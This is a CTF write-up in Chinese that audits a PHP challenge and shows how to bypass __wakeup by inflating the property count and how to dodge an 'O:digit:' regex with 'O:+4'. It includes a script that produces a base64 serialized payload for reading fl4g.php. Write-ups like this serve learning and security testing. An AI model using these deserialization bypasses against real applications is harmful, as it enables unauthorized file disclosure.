拿到题目,是个这,
我们来一波代码审计
1 <?php
2 class Demo {
3 private $file = ‘index.php‘;
4 public function __construct($file) {
5 $this->file = $file; //构造函数,对类的变量进行初始化
6 }
7 function __destruct() {
8 echo @highlight_file($this->file, true);
9 }
10
11 //魔术方法,如果有反序列化的使用,在反序列化之前会先调用这个方法
12 function __wakeup() {
13 if ($this->file != ‘index.php‘) {
14 //the secret is in the fl4g.php
15 $this->file = ‘index.php‘;
16 }
17 }
18 }
19 if (isset($_GET[‘var‘])) {
20 $var = base64_decode($_GET[‘var‘]);
21
22 //正则匹配,如果在var变量中存在O/C:数字(O:数字或者C:数字这样的形式}),不区分大小写,就输出stop hacking!否则的话就进行发序列化
23 if (preg_match(‘/[oc]:\d+:/i‘, $var)) {
24 die(‘stop hacking!‘);
25 } else {
26 @unserialize($var);
27 }
28 } else {
29 highlight_file("index.php");
30 }
31 ?>
审计完成之后,思路就很清晰了,对Demo这个类进行序列化,base64加密之后,赋值给var变量进行get传参就行了 在类Demo中有三个方法,一个构造,一个析构,还有就是一个魔术方法,构造函数__construct()在程序执行开始的时候对变量进行赋初值。析构函数__destruct(),在对象所在函数执行完成之后,会自动调用,这里就会高亮显示出文件。 在反序列化执行之前,会先执行__wakeup这个魔术方法,所以需要绕过,当成员属性数目大于实际数目时可绕过wakeup方法,正则匹配可以用+号来进行绕过。
写一个序列化的脚本
1 <?php
2 class Demo {
3 private $file = ‘index.php‘;
4 public function __construct($file) {
5 $this->file = $file;
6 }
7 function __destruct() {
8 echo @highlight_file($this->file, true);
9 }
10 function __wakeup() {
11 if ($this->file != ‘index.php‘) {
12 //the secret is in the fl4g.php
13 $this->file = ‘index.php‘;
14 }
15 }
16 }
17
18 $a = new Demo("fl4g.php");
19 echo(serialize($a))."\n";
20 echo base64_encode(‘O:+4:"Demo":2:{s:10:" Demo file";s:8:"fl4g.php";}‘)."\n";
21
22 ?>
这里有个坑,这里的 file 变量为私有变量,所以序列化之后的字符串开头结 尾各有一个空白字符(即%00),字符串长度也比实际长度大 2,如果将序列化结 果复制到在线的 base64 网站进行编码可能就会丢掉空白字符,所以这里直接在 php 代码里进行编码。类似的还有 protected 类型的变量,序列化之后字符串首部会加上%00*%00
干脆写个python脚本
注意在python3中,字符串被b‘‘包围,\0表示空格
php中也ok